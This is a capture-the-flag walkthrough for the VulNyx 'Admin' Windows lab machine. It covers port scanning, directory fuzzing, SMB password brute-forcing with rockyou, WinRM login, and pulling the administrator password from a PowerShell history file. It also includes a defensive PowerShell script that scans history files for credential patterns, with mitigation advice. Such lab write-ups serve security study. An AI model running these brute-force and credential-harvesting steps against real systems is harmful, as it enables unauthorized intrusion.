VulNyx Admin Walkthrough

Windows box; the VM is available at https://vulnyx.com/file/Admin.php.
The exercise is mostly about information gathering on Windows.

Port scan.

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 09:46 CST
Nmap scan report for 192.168.56.143
Host is up (0.00033s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:6F:32:A3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: ADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6f:32:a3 (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2024-11-04T07:47:21
|_  start_date: N/A
|_clock-skew: 6h00m02s

This machine does not expose LDAP, but port 80 is open; fuzzing it for files turns up only a single txt file.

gobuster dir -u "http://192.168.56.143/" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500  -o 80.log
/tasks.txt            (Status: 200) [Size: 98]
/Tasks.txt            (Status: 200) [Size: 98]
/TASKS.txt            (Status: 200) [Size: 98]

The file contents look like a hint, and they also reveal the username hope.

└─$ curl http://$IP/tasks.txt 
Pending tasks:

 - Finish website
 - Update OS
 - Drink coffee
 - Rest
 - Change password

By hope

With the username known, the password is brute-forced over SMB.

└─$ netexec smb $IP -u hope -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB         192.168.56.143  445    ADMIN            [+] ADMIN\hope:loser

Check WinRM access: the login works.

└─$ netexec winrm $IP -u hope -p loser 
WINRM       192.168.56.143  5985   ADMIN            [*] Windows 10 / Server 2019 Build 19041 (name:ADMIN) (domain:ADMIN)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.143  5985   ADMIN            [+] ADMIN\hope:loser (Pwn3d!)

Logging in as hope gives a shell and the user flag.

└─$ evil-winrm -i $IP -u hope  -p loser                                    

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hope\Documents> whoami
admin\hope

Upload winPEAS for enumeration; note the PowerShell history file it reports.

╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.19041.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 234B

The file contents contain the administrator password.

*Evil-WinRM* PS C:\Users\hope\Documents> type C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Set-LocalUser -Name "administrator" -Password (ConvertTo-SecureString "SuperAdministrator123" -AsPlainText -Force)
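The root of this finding is that PSReadLine persists every interactive command, including ones that embed a plaintext secret, to a per-user ConsoleHost_history.txt that any process running as that user can read. The following PowerShell is an added example written for this walkthrough, not part of the original post or of winPEAS: it audits the history files of all local profiles for credential-bearing commands such as the Set-LocalUser line above, reports them with the quoted values redacted, and shows the mitigation. The sample history lines and the password in them are constructed for the demo; the pattern list and the function names are this example's own choices.

```powershell
# Added example (not from the original walkthrough): audit PSReadLine history files
# for commands that embed plaintext credentials, the way the Set-LocalUser line did.
# Assumptions: run elevated on the host being audited so every profile is readable;
# the sample history below is constructed for the demo, not taken from the box.

# Patterns that indicate a secret was typed on the command line (-match is
# case-insensitive in PowerShell, so no flags are needed).
$SensitivePatterns = @(
    '-AsPlainText',                          # ConvertTo-SecureString "..." -AsPlainText
    '-Password\s+\S',                        # Set-LocalUser / New-LocalUser -Password ...
    '\bnet\s+user\s+\S+\s+\S+',              # net user <name> <password>
    '(api[_-]?key|token|secret)\s*[:=]'      # generic key/token assignments
)

function Find-SensitiveHistoryLine {
    param(
        [Parameter(Mandatory)] [string[]] $Lines,
        [string] $Source = '<inline>'
    )
    $hits = @()
    for ($i = 0; $i -lt $Lines.Count; $i++) {
        foreach ($pattern in $SensitivePatterns) {
            if ($Lines[$i] -match $pattern) {
                $hits += [pscustomobject]@{
                    Source  = $Source
                    LineNo  = $i + 1
                    Pattern = $pattern
                    # Redact quoted strings so the audit report itself does not leak the secret.
                    Preview = ($Lines[$i] -replace '"[^"]*"', '"<redacted>"')
                }
                break   # one hit per line is enough
            }
        }
    }
    return $hits
}

function Get-AllUserHistoryFiles {
    # PSReadLine writes one history file per user profile at this relative path.
    Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $path = Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
        if (Test-Path $path) { Get-Item $path }
    }
}

# --- Demo on constructed sample input -----------------------------------------
$sampleHistory = @(
    'Get-Process | Sort-Object CPU -Descending',
    'Set-LocalUser -Name "svc_demo" -Password (ConvertTo-SecureString "Example-Pass-123" -AsPlainText -Force)',
    'Get-ChildItem C:\inetpub\wwwroot'
)
# Expected: exactly one hit, line 2, with both quoted values shown as "<redacted>".
Find-SensitiveHistoryLine -Lines $sampleHistory -Source 'sample' | Format-Table -AutoSize

# --- Real audit across local profiles (run elevated) --------------------------
Get-AllUserHistoryFiles | ForEach-Object {
    Find-SensitiveHistoryLine -Lines (Get-Content $_.FullName) -Source $_.FullName
} | Format-Table -AutoSize

# Mitigation for the current profile: stop persisting history at all.
Set-PSReadLineOption -HistorySaveStyle SaveNothing
```

Two caveats for a defender. First, the audit only finds what the pattern list anticipates; treat it as a triage aid, and after a hit rotate the exposed credential rather than just deleting the line, because the file may already have been copied. Second, PSReadLine 2.1 and later ship a default AddToHistoryHandler that refuses to save lines containing "password", "asplaintext", "token", "apikey" or "secretkey", which would have kept the Set-LocalUser command above out of the file; the PSReadLine bundled with Windows PowerShell 5.1 on a Windows 10 19041 build predates that, so updating the module (Install-Module PSReadLine) is the cheaper fix where history is still wanted.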

Logging in with the administrator password gives root.

└─$ evil-winrm -i $IP -u administrator  -p SuperAdministrator123

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
admin\administrator
